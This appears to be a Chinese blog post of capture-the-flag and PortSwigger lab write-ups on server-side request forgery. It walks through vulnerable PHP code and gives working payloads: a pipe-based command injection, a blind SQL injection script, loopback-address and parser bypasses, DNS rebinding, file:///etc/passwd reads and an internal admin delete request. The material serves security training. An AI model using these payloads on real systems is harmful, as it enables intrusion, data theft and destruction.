SSRF专题-题解

已于 2024-07-17 15:52:09 修改
阅读量509 收藏 7
点赞数 7
CC 4.0 BY-SA版权
文章标签: 网络安全 web安全 安全 web
于 2024-06-27 12:56:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/asmartrman/article/details/139685647

SSRF专题-题解(持续更新)


想系统学习一下SSRF,这个专题用来记录自己找的一些SSRF题目

BUUCTF

BUUCTF-[HITCON 2017]SSRFme

题目直接丢了一段代码让审计

120.32.142.100 <?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {//检测是否存在X_FORWARDED_FOR头
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);//如果存在,将X_FORWARDED_FOR头部拆分成一个数组
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];//提取出数组的第一个IP地址
    }//这一段代码的作用总的说就是判断是否存在X_FORWARDED_FOR头部,如果存在,将其中的第一个IP地址取出

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);//将上面获得的ip地址结合一个字符串orange进行md5加密
    @mkdir($sandbox);//基于生成的哈希值在sandbox目录下创建一个子目录
    @chdir($sandbox);//切换到该目录

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));//使用 shell_exec 执行系统命令 GET 来获取 URL 的内容,并将结果存储在 $data 变量中;
    //escapeshellarg 用于对 $_GET["url"] 进行转义以避免命令注入
    $info = pathinfo($_GET["filename"]);// 获取$_GET["filename"]的路径信息
    $dir  = str_replace(".", "", basename($info["dirname"]));// 去除目录名中的点号,创建目录并更改工作目录
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);// 将下载的数据保存到指定的文件中
    highlight_file(__FILE__);// 高亮显示当前PHP文件的源代码

简单来说,这段代码获取用户输入的URL内容,然后将其存入filename对应的位置。
我们先看看根目录有哪些文件

url=/&filename=test

在这里插入图片描述
又一个readflag,应该是要用readflag读取flag。那如何执行呢,这里考到了GET的一个命令执行漏洞。GET使用file协议时候底层会调用perl中的open函数,而perl函数要打开的文件名中如果以管道符(键盘上那个竖杠|)结尾,就会中断原有打开文件操作,并且把这个文件名当作一个命令来执行,并且将命令的执行结果作为这个文件的内容写入。这个命令的执行权限是当前的登录者。如果你执行这个命令,你会看到perl程序运行的结果。
整理一下思路,现在我们需要打开一个文件名是执行readflag命令的文件;没有这个文件所以我们要先创建,创建后访问这个url并将结果存入test文件即可。

url=&filename=bash -c /readflag|
url=file:bash -c /readflag|&filename=test

在这里插入图片描述

BUUCTF-[第二章 web进阶]SSRF Training

点击查看源码
在这里插入图片描述
代码如下:

<?php 
highlight_file(__FILE__);
function check_inner_ip($url) 
{ 
    $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); 
    if (!$match_result) 
    { 
        die('url fomat error'); 
    } 
    try 
    { 
        $url_parse=parse_url($url); 
    } 
    catch(Exception $e) 
    { 
        die('url fomat error'); 
        return false; 
    } 
    $hostname=$url_parse['host']; 
    $ip=gethostbyname($hostname); 
    $int_ip=ip2long($ip); 
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16; 
} 

function safe_request_url($url) 
{ 
     
    if (check_inner_ip($url)) 
    { 
        echo $url.' is inner ip'; 
    } 
    else 
    {
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_HEADER, 0); 
        $output = curl_exec($ch); 
        $result_info = curl_getinfo($ch); 
        if ($result_info['redirect_url']) 
        { 
            safe_request_url($result_info['redirect_url']); 
        } 
        curl_close($ch); 
        var_dump($output); 
    } 
     
} 

$url = $_GET['url']; 
if(!empty($url)){ 
    safe_request_url($url); 
} 

?>

看一看代码执行流程,首先接收一段URL

$url = $_GET['url'];

然后判断,如果URL非空,那么执行safe_request_url函数

if(!empty($url)){ 
    safe_request_url($url); 
}

然后看safe_request_url函数

function safe_request_url($url) 
{ 
     
    if (check_inner_ip($url)) //判断check_inner_ip()执行结果是否为true,是则报错
    { 
        echo $url.' is inner ip'; 
    } 
    else 
    {
        $ch = curl_init(); //初始化一个curl会话
        curl_setopt($ch, CURLOPT_URL, $url);//设置要获取的url为传入的url参数
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //将传输结果返回为字符串
        curl_setopt($ch, CURLOPT_HEADER, 0); //不返回头部信息
        $output = curl_exec($ch); //执行curl请求
        $result_info = curl_getinfo($ch); //获取请求信息
        if ($result_info['redirect_url']) //判断是否需要重定向,如果需要那么用safe_request_url函数处理,也就是不断向下执行,直到获取到数据为止
        { 
            safe_request_url($result_info['redirect_url']); 
        } 
        curl_close($ch); //关闭curl会话:
        var_dump($output); //输出结果;
    } 
     
}

现在看看check_inner_ip函数,它用于检查给定的URL是否属于内部IP地址(如私有IP地址范围)

function check_inner_ip($url) 
{ 
    $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); //首先判断传入的参数是否为url格式
    if (!$match_result) //如果不是则报错
    { 
        die('url fomat error'); 
    } 
    try 
    { 
        $url_parse=parse_url($url); //parse_url会将url分成6个部分,(scheme, host, port, path, query, fragment)
    } 
    catch(Exception $e) //执行失败就报错
    { 
        die('url fomat error'); 
        return false; 
    } 
    $hostname=$url_parse['host']; //获取主机名
    $ip=gethostbyname($hostname); //将主机名解析为ip地址
    $int_ip=ip2long($ip); // 将IP地址转换为整数
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16; // 检查IP地址是否属于内网IP范围,如果属于就返回true
}

所以我们的目的就是,通过curl读取flag.php里面的数据,也就是说,在不考虑任何过滤的理想情况下,我们的payload应该是这样的

curl http://127.0.0.1/flag.php

所以现在的目的是绕过私有ip的检测,而通过代码审计我们可以发现,私有ip检测的对象其实是利用parse_url()函数处理后的host参数,parse_url()处理后的具体参数如下

	[scheme] => http
    [host] => hostname
    [user] => username
    [pass] => password
    [path] => /path
    [query] => arg=value
    [fragment] => anchor

而这样的拆分方法主要是适用于以下完整的url:

http://username:password@hostname/path?arg1=value1&arg2=value2#anchor

而curl,按照其解析方式只会考虑第一个 @ 符号作为分隔用户信息和主机部分的分隔符。那么这里我们就需要两个@符号了。一个@用于curl解析,另一个@用于提供给私有ip检测,所以可以构造如下payload:

http://a:@127.0.0.1:80@www.baidu.com/flag.php

成功获取flag
在这里插入图片描述

CTFHUB

2021-第四届红帽杯网络安全大赛-Web-WebsiteManger(ctfhub)

访问网页源码,发现可疑的注入点
在这里插入图片描述
测试发现没有过滤if

?id=if(1=1,3,5)//1=1返回3
?id=if(1=2,3,5)//1!=2返回5

在这里插入图片描述
编写一个简单的布尔盲注脚本

import requests

# 目标URL和初始payload
url = 'http://challenge-693ece1a4005fc3d.sandbox.ctfhub.com:10800/image.php'
payload_template = "?id={}"

# 字符集合,根据需要调整
charset = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

# 初始化提取出来的数据
extracted_data = ''

# 循环提取每个位置的字符
for position in range(1, 50):  # 假设最多50个字符
    found = False
    for char in charset:
        # 构造当前测试的payload
        payload = payload_template.format(
            f"if(ascii(mid(database(),{position},1))=ord('{char}'),3,5)"
        )
        # 发送请求
        response = requests.get(url + payload)
        # print(payload)
        # 根据应用的不同响应来判断条件是否成立
        if len(response.text)>400:
            extracted_data += char
            found = True
            break
    if not found:
        break

print("Extracted data:", extracted_data)

得到数据库名ctf

if(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=\'ctf\'),{position},1))=ord('{char}'),3,5)#表名

最后跑出管理员信息如下:admin、714e60f36551d03b5bcb3c1ef5e3aa74

接下来是ssrf,测试127.0.0.1
在这里插入图片描述
使用curl进行读取,那么使用file协议读取内容即可

payload=file:///flag

在这里插入图片描述

攻防世界

SSRF Me(攻防世界)

打开网址,提示输入url和验证码
在这里插入图片描述
首先看看验证码逻辑,判断验证码后六位的md5值是否和给出的字符串相等,所以我们可以编写以下代码

<?php
    $capture=0;//初始化验证码为0
    while(true){
        if(substr(md5($capture), -6, 6) == "c84407"){//直到末尾6位符合条件时输出值,并跳出循环
             echo "$capture";
             break;
        }
        $capture+=1;//不对就不断累加
    }
?>

在这里插入图片描述
得到验证码,然后输入网址,源码中得知本机不能访问外网
在这里插入图片描述
于是访问本机地址测试,利用file协议直接读取本地flag文件

file:///flag

在这里插入图片描述
提示hacker,换一个文件夹读取试试

file:///etc/passwd

在这里插入图片描述
没问题,所以应该是flag被过滤了,对flag进行url编码(注意一般url编码都是对特殊字符进行编码,要对字母进行编码可以将字母转为hex形式,或者转为16进制加百分号即可)
在这里插入图片描述

file:///%66%6c%61%67

在这里插入图片描述

CTFSHOW

Web351(CTFSHOW)

<?php
error_reporting(0);//禁用错误报告,也就是脚本运行过程中遇到遇到任何错误或警告,它们不会显示在输出中
highlight_file(__FILE__);//使用语法高亮显示当前文件的源代码
$url=$_POST['url'];//从POST请求中获取名为 url 的参数
$ch=curl_init($url);// 初始化一个cURL会话
curl_setopt($ch, CURLOPT_HEADER, 0);//设定不包含头信息在输出中
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//设定将cURL执行结果返回,而不是直接输出;只有这样才能将结果存储在一个变量中,而不是直接输出在页面上。
$result=curl_exec($ch);//执行cURL会话,并将结果存储在 $result 变量中
curl_close($ch);//关闭cURL会话并释放资源
echo ($result);//输出结果
?>

代码审计发现,代码本身没有进行任何过滤,所以直接读取flag就行了
在这里插入图片描述

Web352(CTFSHOW)

<?php
error_reporting(0);//禁用错误报告
highlight_file(__FILE__);//高亮显示文件内容
$url=$_POST['url'];//获取POST传递的url参数
$x=parse_url($url);//使用 parse_url 函数解析URL,返回一个包含URL各部分的关联数组(scheme, host, path等)。
if($x['scheme']==='http'||$x['scheme']==='https'){//检查URL的协议是否为HTTP或HTTPS。如果是,继续执行;
if(!preg_match('/localhost|127.0.0/')){//没有指定对哪个字符串进行匹配,纯没用
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

看似过滤,其实没有匹配字符串,和上题一样的POC即可

url=http://127.0.0.1/flag.php

在这里插入图片描述

Web353(CTFSHOW)

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

与上一题对比,可以看出这题对url进行了验证

if(!preg_match('/localhost|127.0.0/'))

变为了

if(!preg_match('/localhost|127\.0\.|\。/i', $url))

具体过滤规则如下

1、localhost 匹配字符串 "localhost"2127\.0\. 匹配字符串 "127.0."。注意,反斜杠 \ 是为了转义点号 .,因为在正则表达式中,点号 . 表示任意单个字符。
3| 是一个“或”运算符,表示匹配 "localhost""127.0."4/i 表示不区分大小写的匹配。

注意这里没法用file协议读取,因为源码里面验证了访问协议必须为http或者https

if($x['scheme']==='http'||$x['scheme']==='https')

所以只能想办法绕过本地ip了,可以采用进制转换的方式绕过

127.0.0.1->0177.0.0.1//8进制
127.0.0.1->2130706433//10进制整数
127.0.0.1->0x7F.0.0.1//16进制
127.0.0.1->0x7F000001//16进制整数

还有几个特殊的绕过方式

127.0.0.1->0//在linux中,0表示本地地址
127.0.0.1->127.1//在解析IP地址时,省略的部分会被自动补齐为零
127.0.0.1->127.127.127.127//127.127.127.127 是一个有效的IPv4地址,属于 127.0.0.0/8 子网。这个子网的所有地址都被保留用于本地环回测试。因此,127.127.127.127 实际上也指向本地主机。

在这里插入图片描述

Web354(CTFSHOW)

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

和上题相比,这道题多了对0和1的判断,任何带有0或1的字符串都将被匹配报错,所以找个能够解析道127.0.0.1的域名接口

http://sudo.cc/flag.php

在这里插入图片描述
或者在自己服务器上搭建一个302跳转

<?php
// 设置重定向URL
$redirect_url = "http://127.0.0.1/flag.php";

// 发送HTTP头,重定向到新的URL
header("Location: $redirect_url");

// 确保脚本停止执行
exit();
?>

然后传入这个自己服务器的脚本地址即可

http://域名/redirect.php

也可以注册一个ceye账号,用平台提供的域名进行测试,添加dns解析127.0.0.1
在这里插入图片描述
url格式为

http://r.域名/flag.php

r. 前缀通常用于DNS回显。它表明你在使用DNS协议来进行回显测试。

Web355(CTFSHOW)

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=5)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

限制了目标服务器的域名或IP地址长度不超过5

if((strlen($host)<=5))
payload:url=http://127.1/flag.php

在这里插入图片描述

Web356(CTFSHOW)

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=3)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

限制IP位数小于等于3,那用0就行了

payload:url=http://0/flag.php

在这里插入图片描述

Web357(CTFSHOW)

<?php
error_reporting(0); // 禁用错误报告
highlight_file(__FILE__); // 高亮显示文件的源代码

$url = $_POST['url']; // 从POST请求中获取URL
$x = parse_url($url); // 解析URL,返回其组成部分的数组

// 检查URL的协议是否为HTTP或HTTPS
if ($x['scheme'] === 'http' || $x['scheme'] === 'https') {
    $ip = gethostbyname($x['host']); // 获取主机名的IP地址
    echo '</br>' . $ip . '</br>';

    // 检查IP地址是否是公共IP地址(不是内网或保留地址)
    if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
        die('ip!'); // 如果是内网或保留地址,终止脚本执行
    }

    echo file_get_contents($_POST['url']); // 获取并显示URL的内容
} else {
    die('scheme'); // 如果协议不是HTTP或HTTPS,终止脚本执行
}
?>

这段代码与上面几题不同的地方在于,使用了内置的fileter_var函数来校验ip的合法性,我们详细解释一下这部分代码

if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
        die('ip!'); // 如果是内网或保留地址,终止脚本执行
    }
filter_var 是一个PHP内置函数,用于验证和过滤数据。
第一个参数 $ip 是要验证的IP地址。
第二个参数 FILTER_VALIDATE_IP 指定了过滤器类型,表示要验证输入的值是否是一个合法的IP地址。
第三个参数是标志,指定了额外的验证选项:
	FILTER_FLAG_NO_PRIV_RANGE:检查IP地址是否在私有IP范围内。如果IP地址属于私有范围,此标志会使验证失败。
	FILTER_FLAG_NO_RES_RANGE:检查IP地址是否在保留IP范围内。如果IP地址属于保留范围,此标志会使验证失败。

私有地址范围

10.0.0.010.255.255.255
172.16.0.0172.31.255.255
192.168.0.0192.168.255.255

保留IP地址范围

0.0.0.0/8:当前网络段
127.0.0.0/8:环回地址(本地主机)
169.254.0.0/16:链路本地地址
192.0.2.0/24TEST-NET-1,文档和示例用
198.51.100.0/24TEST-NET-2,文档和示例用
203.0.113.0/24TEST-NET-3,文档和示例用
224.0.0.0239.255.255.255:组播地址
240.0.0.0255.255.255.254:未来使用
255.255.255.255:广播地址

也就是说,这段代码也就是验证了以上IP地址范围,我们注意到整段代码中调用了两次url,一次是用于验证的filter_var,一次是获取内容的file_get_contents。
那我们可以使用ceye做dns rebinding,绑定两个ip,一个ip用于绕过验证,另一个ip用于读取
在这里插入图片描述
这样的话第一次域名解析得到的ip就是38.39.38.39,通过了验证;第二次读取文件内容时域名解析得到的ip就是127.0.0.1,成功获取文件
在这里插入图片描述
或者直接用自己的服务器,同Web354
在这里插入图片描述

Burpsuit靶场

Blind SSRF with out-of-band detection

前两关的漏洞点出现在检查库存处,本关中没有检查库存功能,根据题解发现漏洞点位于Referer处(长脑子了长脑子了…)
点击一个商品
在这里插入图片描述
burp中抓到如下包
在这里插入图片描述

打开Collaborator,获取一个url
在这里插入图片描述

copy
在这里插入图片描述
将抓到包的Referer值改为copy的url,重新发包
在这里插入图片描述
直接点击poll now能够立马接收到数据,否则默认60s刷新
在这里插入图片描述
这里有个问题,不明白为什么能够利用Referer头进行SSRF利用,挖个坑后面搞懂了填上,评论区有师傅知道的话麻烦指点一下(Respect

SSRF with blacklist-based input filter

一样是检查库存功能点
在这里插入图片描述
直接替换地址已经不行了
在这里插入图片描述
题目提示黑名单,说明限制了url,而localhost和admin都可能被过滤,这里我们一个一个绕过,首先是localhost,表示本机地址,可以用127.0.0.1代替,而127.0.0.1也被限制了
在这里插入图片描述
这时候可以采用的地址有几种,这里只指出本题可以使用的

http://127.1 //省略0
或修改本地hosts文件

在这里插入图片描述

更多绕过方法可以看这篇文章
localhost绕过方法
接下来绕过admin,对字母a经过两次url编码绕过
在这里插入图片描述
为什么两次url编码呢?因为测试一次编码不行。。。。
接下来直接删除即可
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

SSRF with filter bypass via open redirection vulnerability

点击next product
在这里插入图片描述
302跳转
在这里插入图片描述
这里有个问题,这个位置无法跟踪跳转,也就是如果简单拦截修改放包,只能够在本机跳转,仍然没有内网的访问权限,所以我们需要一个接口来获取跳转页面信息,那么检查库存接口又能派上用场了

payload:stockApi=/product/nextProduct%3fcurrentProductId%3d1%26path%3dhttp%3a//192.168.0.12%3a8080/admin

在这里插入图片描述
获取到删除链接后就可以将网址改为删除链接做ssrf

payload:stockApi=/product/nextProduct%3fcurrentProductId%3d1%26path%3dhttp%3a//192.168.0.12%3a8080/admin/delete%3fusername%3dcarlos

在这里插入图片描述

Wine_Jar
关注
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger
weixin_40872714的博客
03-26 1928
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger(布尔盲注、SSRF ) 场景描述:最新的网站测试器,作为非站长的你,能利用好它的功能吗? 场景打开后,如下,是个登录框 查看源码,发现可能的注入点 /image.php?id=2 布尔盲注 /image.php?id=if(1=1,1,5) True /image.php?id=if(1=2,1,5) False 条件为真时?id=1,回显第一张图片,条件为假时?id=5,没有id=5的图片,什么都没有。即可
【Burpsuit靶场记录】(后续题目更新到主页不同的漏洞专题
asmartrman的博客
02-19 776
Burpsuit靶场记录(手续题目更新到主页不同的漏洞专题
CTFhub---WebsiteManger
jiet07的博客
11-09 2707
思路 进入题目:刷新,图片会更新 新建标签页打开,有id参数 使用sqlmap 进行测试
CTFHUB WEBSITE WEBMANAGER 通关
qq_43338937的博客
09-11 481
考点 ssrf 布尔盲注 测试登录页面 username参数位置可以进行布尔盲注 手工测试 a" or sleep(2)--+ 参数使用post提交 保存数据包 利用sqlmap工具进行注入获取数据库 表 用户密码 python3 sqlmap.py -r a.txt --data="username=a&password=a" -p username --curent-db python3 sqlmap.py -r a.txt --data="username=
ctfhub-历年真题web-WebsiteManger
Ewige的博客
07-12 1882
ctfhub 历年真题 webWebsiteManger题目考点解题思路 WebsiteManger 题目考点 布尔盲注 SSRF 解题思路 进行登入点使用sqlmap 测试无果 仔细观察, 图片链接处存在注入点 使用sqlmap进行测试 sqlmap -u "http://challenge-94b51247b7b2ac6f.sandbox.ctfhub.com:10800/image.php?id=3" --tamper space2mysqlblank --technique=B --
CTFHub 信息泄露技能树
qq_43936524的博客
04-20 373
文章目录备份文件下载网站源码bak文件vim缓存.DS_Storegit泄露logslashIndexSVN泄露HG泄露 备份文件下载 网站源码 泄露文件夹为www.zip,解压后得到三个文件 访问Web目录下flag_256061047.txt路径得到flag bak文件 dirsearch扫描结果 vim缓存 当开发人员在线上环境中使用 vim 编辑器,在使用过程中会留下 vim 编辑器缓存,当vim异常退出时,缓存会一直留在服务器上,引起网站源码泄露。 第一次意外退出产生的交换文件名为 .i
网络安全】一篇文章带你了解CTF那些事儿
2301_77160226的博客
08-01 2627
CTF,即 Capture The Flag,中文名为夺旗赛,是一种网络安全技术人员之间进行技术竞技的比赛形式。在 CTF 比赛中,参赛者需要通过解决各种与网络安全相关的技术挑战来获取“旗帜”,这些挑战通常涵盖了多个领域的知识和技能,例如密码学、Web 安全、逆向工程、漏洞挖掘与利用、隐写术、二进制分析等等。比如说,在密码学相关的挑战中,可能需要参赛者破解加密的信息或算法来获取关键线索;Web 安全挑战可能要求找出网站存在的漏洞并加以利用;逆向工程则可能涉及对未知软件或程序的分析和理解。
CTFHUB之Web安全—信息泄露
Lucky小小吴的小屋
10-24 3584
本模块有十道题 目录遍历 phpinfo 备份文件下载(4道) 网站源码 bak文件 vim缓存 .DS_Store Git泄露 SVN泄露 HG泄露
2021第四届红帽杯网络安全大赛-线上赛Writeup
热门推荐
末初 · mochu7
05-10 1万+
记录一下被锤爆的一天…orz。
2021红帽杯 WebsiteManger
LYJ20010728的博客
06-22 831
2021红帽杯 WebsiteManger考点思路Payload 考点 布尔盲注、SSRF 思路 尝试一般的登录方法没得用处,F12查看,登录框没有sql注入的利用点,发现还有一张图片,好家伙,sql注入的利用点在图片上 当id的值为0时没有图片回显,利用布尔盲注得到用户密码:14348d305648989c355433b9a04dffce,用户名为:admin,登录进去一个很明显的ssrf考点 猜测 flag在根目录下:file:///flag Payload 盲注脚本 impo
CTFHub-web详解
shayebudon的博客
11-20 3663
信息泄露 目录遍历 遍历每一个文件夹,找到flag.txt,复制内容提交 PHPINFO 打开页面,从信息中寻找flag。 备份文件下载 网站源码 尝试各种组合,最后发现在网站后添加www.zip后成功下载压缩文件 将解压后的文件名放在url后,即可出现flag bak文件 下载index.php.bak打开即可看到flag vim缓存 当开发人员在线上环境中使用 vim 编辑器,在使用过程中会留下 vim 编辑器缓存,当vim异常退出时,缓存...
ssrf漏洞利用+CTF实例
hyq99999的博客
09-08 1663
ssrf漏洞,redis未授权访问
CTFhub通关攻略-SSRF篇【1-5关】
qq_65852138的博客
08-27 899
CTFhub通关攻略【SRRF篇】
ctf-ssrf
K_DREAM_G的博客
05-26 1144
由上面代码和分析我们可以知道当我们访问/geneSign路由时那个页面会返回secert_key + param + action的MD5值,在genesign中secert_key,action是固定值,可操作的只有param。看/De1ta路由它调用了Task类我们最终获得flag的代码就在这个类中,所以我们必须通过/De1ta来获取flag,对于这个路由,param,action,sign都是我们可以操作的。6-13: 定义Task类,用于处理接收到的任务请求,包括执行动作、验证签名及结果反馈。
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it
Anton__1的博客
05-12 3052
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it 看群里说CTFHub上复现了, 我来看看 本来想按照红帽杯的套路来试一下,发现phpinfo里莫得flag了 只能想想其他办法咯 <?php #Really easy... $file=fopen("flag.php","r") or die("Unable 2 open!"); $I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize(
第四届红帽杯网络安全大赛 Web 部分writeup
feng的博客
05-09 1万+
前言 记录一下web的wp,随手写的,只会前三题,确实都很简单。 find_it 扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag: ?code=<?= show_source(glob('./*')[2]); 再访问hack.php: base32解密一下即可得到flag。 framework 是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打: &lt
CTFHub——Web技能树
mcmuyanga的博客
01-23 876
CTFHub Web 网上收集的资料,本地上传,原文链接丢失,只是整理了一下,记录一下做题过程, 信息泄露 目录遍历 用python脚本找一下flag.txt的路径 import requests url = "http://challenge-9360ebe6745e6c45.sandbox.ctfhub.com:10080/flag_in_here/" for i in range(5): for j in range(5): url_test =url+"/"+s
CTFHub之web基础刷题记录
bmth666的博客
03-12 3511
CTFHub之从入门到入土。第一部 信息泄露全方位解析+密码泄露wp
CTFHub-web(基础认证)
分享与记录
03-26 9214
发现题目需要登录,先任意输入admin/admin进行登录尝试。没什么反应。抓包看数据。可以看见一条特殊字符串Basic realm="Do u know admin ?,暂时没有其他线索,我们假设用户名就是admin,然后进行暴力破解。 Basic表示基础认证,字符串格式xxxxxxxxx==大概率为Base64编码 Base64解码得到开始尝试输入的账号和密码 将报文发送到Intrude...
ssrf-testing
最新发布
03-31
### SSRF 测试方法与工具 服务器端请求伪造 (Server-Side Request Forgery, SSRF) 是一种攻击方式,允许攻击者通过目标应用程序发起内部网络或其他系统的 HTTP 请求。以下是关于如何执行 SSRF 测试以及可以使用的工具的相关信息。 #### 方法概述 SSRF 的测试通常涉及识别可能被利用的应用程序功能并验证其行为是否符合预期。常见的测试方法包括但不限于以下几种: - **URL 参数注入**:尝试向 URL 中注入不同的协议(如 `http://`, `file://` 或其他自定义协议),观察服务端返回的结果是否有异常响应[^4]。 - **IP 地址扫描**:输入本地回环地址 (`127.0.0.1`) 或私有 IP 范围内的地址来检测是否存在未授权访问漏洞。 - **时间延迟分析**:如果某些请求导致明显的延迟,则可能是由于防火墙规则或者代理配置不当引起的潜在风险。 #### 工具推荐 为了更高效地完成 SSRF 测试工作,可以选择一些专门设计用于此目的的安全评估软件包或框架: - **Burp Suite**: 这是一个非常流行的Web应用安全测试平台,其中包含了多种扩展插件可以帮助发现各种类型的漏洞,其中包括针对SSRF的具体模块[^5]。 示例代码展示如何设置 Burp 来拦截流量: ```bash export http_proxy=http://localhost:8080 https_proxy=http://localhost:8080 curl --proxy localhost:8080 'https://example.com/api?url=http://internal-service' ``` - **OWASP ZAP**: 另一款强大的开源渗透测试工具,支持自动爬取网站结构并与之交互的同时记录所有的HTTP会话数据流以便后续审查[^2]。 - **Swarmfuzzer**: Google 开发的一个模糊测试器项目,虽然主要用于浏览器安全性研究领域,但它也可以用来探索API接口层面可能出现的边界条件错误从而触发SSRF等问题。 #### 注意事项 尽管上述技术和工具有助于提高效率,但在实际操作过程中仍需注意合法合规性问题,确保所有活动都在授权范围内开展,并遵循相应的法律法规要求[^1]。 ```python import requests def test_ssrf(url): try: response = requests.get(url) print(response.status_code) return response.text except Exception as e: print(e) test_url = input("Enter the target URL:") result = test_ssrf(test_url) print(result) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值